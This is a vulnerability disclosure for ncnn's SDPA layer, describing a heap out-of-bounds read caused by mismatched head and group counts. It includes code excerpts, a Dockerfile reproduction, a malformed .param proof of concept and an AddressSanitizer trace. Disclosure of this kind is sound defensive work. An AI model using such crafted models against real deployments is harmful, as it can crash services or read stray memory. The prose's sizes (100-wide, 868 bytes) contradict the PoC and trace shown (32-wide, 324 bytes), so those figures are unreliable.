SDPA Shape Mismatch Causes Heap Out-Of-Bounds Read
Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/sdpa_x86.cpp:254 in SDPA_x86::forward
Sanitizer verdict: heap-buffer-overflow
Summary
A model whose SDPA query head count is not a multiple of its key/value group count makes ncnn select a key channel that does not exist, producing a Mat view past the end of the key allocation that the AVX-512 GEMM then reads out of bounds, aborting ncnnoptimize. The attacker supplies only a .param file; ncnnoptimize inparam inbin outparam outbin 0 materializes the declared Input shapes and executes the graph in ModelWriter::shape_inference(). Without a sanitizer the stale bytes are multiplied into the attention scores instead of trapping.
Detail
SDPA_x86::forward reads num_heads from the query tensor and num_group from the key tensor, then assumes grouped-query attention's invariant that the groups evenly divide the heads. num_heads_per_group is computed with plain integer division, and the per-head key channel is i / num_heads_per_group — an expression that only stays in range when num_heads % num_group == 0. Nothing validates that, and Mat::channel performs no bounds check:
// src/layer/x86/sdpa_x86.cpp:149
const int embed_dim = query.w;
const int src_seqlen = query.h;
const int num_heads = query.c;
const int cur_seqlen = cur_key.h;
const int num_group = cur_key.c;
// src/layer/x86/sdpa_x86.cpp:206
const int num_heads_per_group = num_heads / num_group;
// src/layer/x86/sdpa_x86.cpp:248
#pragma omp parallel for num_threads(opt.num_threads)
for (int i = 0; i < num_heads; i++)
{
// 1. Q * K^T
std::vector<Mat> qk_bottom_blobs;
qk_bottom_blobs.push_back(query.channel(i)); // Q: [Seq, Embed]
qk_bottom_blobs.push_back(key.channel(i / num_heads_per_group)); // K: [DstSeq, Embed]
// src/layer/x86/gemm_x86.cpp:1576
const float* p0 = (const float*)B + (j + jj) * B_hstep + k;
int kk = 0;
#if __SSE2__
#if __AVX__
for (; kk + 7 < max_kk; kk += 8)
{
_mm256_storeu_ps(pp, _mm256_loadu_ps(p0));
The PoC declares Input q 0 1 q 0=100 1=1 2=3 against Input k 0 1 k 0=100 1=1 2=2, so num_heads = 3 and num_group = 2. Integer division gives num_heads_per_group = 3 / 2 = 1, which turns the group mapping into the identity i / 1 == i. SDPA sdpa 3 1 q k v out 5=0 leaves kv_cache off, so key = cur_key with key.c == 2.
The final iteration, i == 2, calls key.channel(2) on a two-channel blob. cstep is alignSize(100 * 4, 16) / 4 = 100, so the view starts at data + 2 * 100 * 4 = data + 800 bytes, while the blob's whole allocation is 868 bytes (800-byte payload, 4-byte refcount, 64-byte NCNN_MALLOC_OVERREAD slack). That view still advertises a 100-element row, and it is handed to the GEMM as operand B. pack_B_tile copies it with 32-byte _mm256_loadu_ps loads; the load at offset 64 of the phantom channel starts at byte 864 of the region and spans past its end at 868 — the READ of size 32 ... 0 bytes after 868-byte region in the ASan report.
Reproduce
Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-sdpa-shape-mismatch-causes-heap-out-of-bounds-read && cd ncnn-poc-sdpa-shape-mismatch-causes-heap-out-of-bounds-read
cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04
RUN apt-get update && apt-get install -y --no-install-recommends \
git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
protobuf-compiler libprotobuf-dev \
&& pip3 install --no-cache-dir --break-system-packages onnx protobuf \
&& rm -rf /var/lib/apt/lists/*
RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn
WORKDIR /ncnn
RUN cmake -S . -B build \
-DCMAKE_BUILD_TYPE=Debug \
-DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
-DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
-DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
&& cmake --build build -j"$(nproc)"
ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE
cat > poc.param <<'POC_PARAM'
7767517
4 4
Input q 0 1 q 0=32 1=1 2=3
Input v 0 1 v 0=32 1=1 2=2
Input k 0 1 k 0=32 1=1 2=2
SDPA sdpa 3 1 q k v out
POC_PARAM
docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
/ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0
AddressSanitizer output:
shape_inference
=================================================================
==1==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x514000000380 at pc 0x59df22ae976b bp 0x7ffeee342ef0 sp 0x7ffeee342ee0
READ of size 32 at 0x514000000380 thread T0
#0 0x59df22ae976a in _mm256_loadu_ps(float const*) /usr/lib/gcc/x86_64-linux-gnu/13/include/avxintrin.h:905
#1 0x59df22ae976a in pack_B_tile /ncnn/build/src/layer/x86/gemm_x86_avx512.cpp:1583
#2 0x59df22b615a8 in gemm_x86 /ncnn/build/src/layer/x86/gemm_x86_avx512.cpp:6925
#3 0x59df22ba9c11 in ncnn::Gemm_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/gemm_x86_avx512.cpp:7796
#4 0x59df25383c86 in ncnn::SDPA_x86_avx512::forward(std::vector<ncnn::Mat, std::allocator<ncnn::Mat> > const&, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/build/src/layer/x86/sdpa_x86_avx512.cpp:274
#5 0x59df1c4b170b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:856
#6 0x59df1c499b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
#7 0x59df1c4f99e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
#8 0x59df1c38b3c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
#9 0x59df1c408eee in main /ncnn/tools/ncnnoptimize.cpp:2844
#10 0x788dfd0501c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#11 0x788dfd05028a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#12 0x59df1c388624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
0x514000000384 is located 0 bytes after 324-byte region [0x514000000240,0x514000000384)
allocated by thread T0 here:
#0 0x788dfd6c9f1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
#1 0x59df1c45992d in fastMalloc /ncnn/src/allocator.h:62
#2 0x59df1c45992d in ncnn::Mat::create(int, int, int, unsigned long, ncnn::Allocator*) /ncnn/src/mat.cpp:415
#3 0x59df1c389ca0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:390
#4 0x59df1c408eee in main /ncnn/tools/ncnnoptimize.cpp:2844
#5 0x788dfd0501c9 (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#6 0x788dfd05028a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
#7 0x59df1c388624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)
SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/lib/gcc/x86_64-linux-gnu/13/include/avxintrin.h:905 in _mm256_loadu_ps(float const*)
Credit
Zheng Yu @ DepthFirst